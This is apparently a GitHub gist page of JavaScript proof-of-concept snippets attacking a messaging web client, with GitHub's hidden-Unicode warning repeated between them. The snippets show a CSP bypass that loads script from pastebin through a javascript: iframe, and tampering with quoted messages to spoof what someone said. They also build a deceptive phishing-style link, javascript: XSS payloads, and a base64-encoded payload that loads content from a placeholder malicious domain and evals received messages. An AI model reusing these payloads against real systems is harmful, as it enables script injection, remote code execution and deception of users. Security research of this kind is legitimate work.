This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function _isEvent(prop) { | |
if (0 !== prop.indexOf('on')) { | |
return false; | |
} | |
return true; | |
} | |
function _getEvents(obj) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* this is a script that pops an alert message */ | |
top._CVE_URL = 'https://pastebin.com/raw/dw5cWGK6'; | |
/* this call will fail due to CSP */ | |
var s = document.createElement("script"); s.src = top._CVE_URL; document.body.appendChild(s); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* this is a script that pops an alert message */ | |
top._CVE_URL = 'https://pastebin.com/raw/dw5cWGK6'; | |
/* this call will succeed although CSP */ | |
document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = document.createElement(\"script\");s.src = \"https://pastebin.com/raw/dw5cWGK6\";document.body.appendChild(s);'></iframe>"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
e = { | |
__x_body: "Why would you say that?!", | |
__x_type: "chat", | |
__x_quotedMsg: { | |
body: "I think you are the best!", | |
type: "chat", | |
mentionedJidList: [], | |
isForwarded: false, | |
labels: [], | |
}, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
e.__x_quotedMsg.body = "I think you are the worst!"; // alter the text | |
e.__x_quotedStanzaID = e.__x_quotedStanzaID + "_"; // change the id of the original message |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
e.__x_body = e.__x_matchedText = "https://example.com"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
e.__x_body = e.__x_matchedText = | |
"Join Facebook! https://facebook.com+login_oage&welcome_to_facebook=true&[email protected]/2SfZikR Become a friend of mine!"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
e.__x_body = e.__x_matchedText = "javascript:alert(document.domain)"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
e.__x_body = e.__x_matchedText = 'javascript:"https://example.com";alert(document.domain)'; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var payload = ` | |
hard_expire_time.innerHTML += | |
'<object data="https://MY_MALICIOUS_DOMAIN/MY_PAYLOAD_IFRAME.html" />'; | |
onmessage=(e)=>{eval(JSON.parse(e.data))}; | |
`; | |
payload = `javascript:"https://facebook.com";eval(atob("${btoa(payload)}"))`; | |
e.__x_body = e.__x_matchedText = payload; |
OlderNewer